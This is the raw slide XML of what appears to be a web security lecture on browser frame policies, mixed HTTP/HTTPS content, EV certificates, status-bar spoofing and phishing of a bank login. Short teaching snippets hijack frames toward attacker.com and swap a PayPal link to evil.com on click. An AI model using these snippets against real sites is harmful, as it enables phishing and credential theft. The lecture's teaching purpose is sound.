              <a:ext cx="844" cy="768"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150">
              <a:solidFill>
                <a:srgbClr val="66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1800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1356809" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6057900" y="3748088"/>
            <a:ext cx="1187450" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>awglogin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10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96000" y="41148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990600" y="5029200"/>
            <a:ext cx="5638800" cy="457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1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("https://attacker.com/", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>awglogin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 12" descr="MCj034912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" y="5181600"/>
            <a:ext cx="164623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9" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="1" animBg="1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should the policy be?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46005A46-79CA-40A0-B97E-2AB30C506EA8}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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86550" cy="50577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med"/>
          </a:ln>
        </p:spPr>
      </p:pic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1219200" y="2103438"/>
            <a:ext cx="6537325" cy="4205287"/>
          </a:xfrm>
          <a:prstGeom prst="rect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4" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="2895600"/>
            <a:ext cx="1819275" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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43015" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1362075" y="2895600"/>
            <a:ext cx="2133600" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="rect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514475" y="4648200"/>
            <a:ext cx="1828800" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="381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triangle" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr 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rot="5400000">
            <a:off x="1866900" y="4457700"/>
            <a:ext cx="1447800" cy="1524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3200400" y="3657600"/>
            <a:ext cx="3429000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100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5400000">
            <a:off x="2705100" y="3238500"/>
            <a:ext cx="2514600" cy="182880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arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="2362200" y="3124200"/>
            <a:ext cx="2667000" cy="19050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905000" y="4038600"/>
            <a:ext cx="741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Child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32325" y="3562350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Sibling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749675" y="4324350"/>
            <a:ext cx="1508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B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Descendant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0" y="3810000"/>
            <a:ext cx="1465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BA9921"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Frame Bust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9506" name="Picture 2" descr="http://securityintelligence.com/wp-content/uploads/2013/09/Figure-6-Web-Application-Vulnerabilities-by-Attack-Technique-2009-2013-H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6" y="532735"/>
            <a:ext cx="8348664" cy="6096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91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3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ko-KR" smtClean="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Window Policy Anomaly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46083" name="Picture 4" descr="igoogle-bef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828800"/>
            <a:ext cx="5719763" cy="428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2971800" y="2493963"/>
            <a:ext cx="5638800" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44227"/>
              <a:gd name="adj2" fmla="val 94699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 sz="1800"/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044825" y="2600325"/>
            <a:ext cx="56515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Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top.frames[1].location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top.frames[2].location = "http://www.attacker.com/...";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="igoogle-af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828800"/>
            <a:ext cx="5724525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 animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="47110" grpId="1" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="47111" grpId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315" name="Group 187"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1600200"/>
          <a:ext cx="8229600" cy="4663439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905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(default)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 6 (option)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2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2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Permissive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Window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0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Child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6" name="Picture 62" descr="safar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47117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63" descr="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588" y="2066925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64" descr="firefo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8488" y="4210050"/>
            <a:ext cx="533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9" name="Picture 65" descr="ope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" y="5268913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0" name="Picture 70" descr="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" y="571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1" name="Picture 71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" y="368935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500063" y="2557463"/>
            <a:ext cx="685800" cy="685800"/>
            <a:chOff x="192" y="1310"/>
            <a:chExt cx="480" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44076" name="Picture 73" descr="i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" y="1310"/>
              <a:ext cx="480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72" descr="do-not-enter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93" y="1605"/>
              <a:ext cx="96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4073" name="Picture 130" descr="ie-6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7375" y="317817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74" name="Picture 20" descr="flashjava"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10" cstate="print"/>
          <a:srcRect r="52881"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="869950" y="3852863"/>
            <a:ext cx="349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75" name="Title 4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Legacy Browser Behavior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1" name="Group 4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10003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5445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Browser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Policy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(no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IE7 (with Flash)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Firefox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Safari 3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Opera 9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(many policies)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-80" charset="-128"/>
                      </a:endParaRP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         HTML 5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="109728" marR="109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-80" charset="-128"/>
                        </a:rPr>
                        <a:t>Descendant</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="109728" marR="109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8156" name="Picture 62" descr="safar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375" y="38100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7" name="Picture 64" descr="firef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488" y="3297238"/>
            <a:ext cx="533400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8" name="Picture 65" descr="ope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" y="4410075"/>
            <a:ext cx="5334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59" name="Picture 70" descr="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" y="4876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60" name="Picture 130" descr="ie-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7375" y="2181225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65150" y="2713038"/>
            <a:ext cx="654050" cy="544512"/>
            <a:chOff x="356" y="1652"/>
            <a:chExt cx="412" cy="343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48163" name="Picture 71" descr="ie-6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6" y="1652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64" name="Picture 20" descr="flashjava"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:srcRect r="52881"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="548" y="1755"/>
              <a:ext cx="22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8162" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3048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lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Adoption of Descendant Policy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Security User Interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508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is it safe to type my password?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2531" name="Content Placeholder 4" descr="bank-of-the-west-rea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4000"/>
            <a:ext cx="8001000" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225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B19107E-E21C-473E-B065-BC573B971AEE}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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23622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4114800" y="2133600"/>
            <a:ext cx="1447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6705600" y="5257800"/>
            <a:ext cx="16764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3555" name="Content Placeholder 4" descr="bank-of-the-west-phis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392A480F-211A-4759-A98D-636A288BC7C9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>56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8382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4579" name="Content Placeholder 4" descr="bank-of-the-west-trick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45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DBDD556-A598-42BD-A218-133BD66078AA}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>57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524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172200" y="4343400"/>
            <a:ext cx="2057400" cy="10604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400" y="2133600"/>
            <a:ext cx="3810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" name="Picture 8" descr="vest-up-clos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2" y="2705100"/>
            <a:ext cx="8829675" cy="3238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5603" name="Content Placeholder 4" descr="bank-of-the-west-sketch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8825" y="1527175"/>
            <a:ext cx="8001000" cy="4287838"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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2577E676-3ED8-45D6-BA6D-3F84037411F9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>58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971800" y="21336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435350" y="13716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6553200" y="5257800"/>
            <a:ext cx="1828800" cy="37465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010400" y="5486400"/>
            <a:ext cx="10604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</a:rPr>
              <a:t>???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Safe to type your password?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26627" name="Content Placeholder 4" descr="bank-of-the-west-pi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447800"/>
            <a:ext cx="7105650" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266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A96D87A-10C6-4B2F-B5DB-DBA046A0F0DF}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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886200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60638" y="301783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6080125" y="5513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flipH="1">
            <a:off x="2560638" y="2362200"/>
            <a:ext cx="4144962" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="127000" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FF0000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2286000" y="1957388"/>
            <a:ext cx="1371600" cy="228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lg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09600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Web application vulnerabilities</a:t>
            </a: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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="284204" y="1371600"/>
            <a:ext cx="499264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0" t="14063" r="20681" b="15299"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4361935" y="1219200"/>
            <a:ext cx="4401065" cy="462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092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Mixed Content:  HTTP and HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145920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Page loads over HTTPS, but has HTTP content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network attacker can control page </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IE:   displays mixed-content dialog to user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash files over HTTP loaded with no warning  (!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note:   Flash can script the embedding page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firefox:   red slash over lock icon (no dialog)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Flash files over HTTP do not trigger the slash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Safari: does not detect mixed content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52800" y="6048345"/>
            <a:ext cx="49056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               Dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will talk about this later….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0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Mixed Content:  HTTP and HTTPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1400840" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="33594" t="37500" r="32813" b="40625"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1752600"/>
            <a:ext cx="3276600" cy="160020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914400" y="4038600"/>
            <a:ext cx="7239000" cy="2133600"/>
            <a:chOff x="576" y="1152"/>
            <a:chExt cx="4560" cy="1344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1400836" name="Picture 2" descr="D:\HOME\abarth\svn\papers\https\screenshots\origin-contamination.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect t="55110"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="576" y="1152"/>
              <a:ext cx="4560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00841" name="Oval 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3497" y="1440"/>
              <a:ext cx="336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0842" name="Oval 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1584" y="1451"/>
              <a:ext cx="428" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="76200" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="CC3300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030788" y="1611313"/>
            <a:ext cx="3395662" cy="1741487"/>
            <a:chOff x="3169" y="916"/>
            <a:chExt cx="2139" cy="1097"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1400844" name="Picture 12" descr="unspecifiedSecurityflaw"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:srcRect l="42221" t="47212"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3169" y="1104"/>
              <a:ext cx="2139" cy="909"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1400848" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3638" y="916"/>
              <a:ext cx="920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silly dialogs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157" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1412875" y="2590800"/>
            <a:ext cx="7350125" cy="46355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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="4876800"/>
            <a:ext cx="7239000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="381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9600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000"/>
              <a:t>Mixed content and network attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145715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8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>banks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>login all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>content </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Developer error:     Somewhere on bank site write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dirty="0"/>
              <a:t>	&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://www.site.com/script.js&gt;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/>
              <a:t>Active network attacker can now hijack any session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pP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Better way to include content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=//www.site.com/script.js&gt; &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>served </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>over the same protocol as embedding page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715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Icon 2.0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1396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001000" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" u="sng">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Extended validation (EV) certs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1396740" name="Picture 2" descr="D:\HOME\abarth\svn\papers\https\screenshots\e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6775" y="2438400"/>
            <a:ext cx="7515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96741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914400" y="3511550"/>
          <a:ext cx="739140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624" name="Image" r:id="rId4" imgW="8101587" imgH="1079365" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId4" imgW="8101587" imgH="10793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11550"/>
                        <a:ext cx="739140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6745" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="774700" y="5062538"/>
            <a:ext cx="7573963" cy="15525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Prominent security indicator for  EV  certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  note:  EV site loading content from non-EV site does</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>	   not trigger mixed content warning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Finally:   the status Bar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13844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  <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Trivially </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>spoofable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>=“http://www.paypal.com/”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	        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onclick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=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>this.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> = ‘http://www.evil.com/’;”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>     PayPal&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128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838200" y="1905000"/>
            <a:ext cx="6477000" cy="762000"/>
            <a:chOff x="528" y="1200"/>
            <a:chExt cx="4080" cy="480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="138445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 t="87500" r="36719" b="4167"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="720" y="1200"/>
              <a:ext cx="3888" cy="38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</p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1384457" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="528" y="1344"/>
              <a:ext cx="2688" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="none" w="lg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Cookies:   client state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1095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  <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
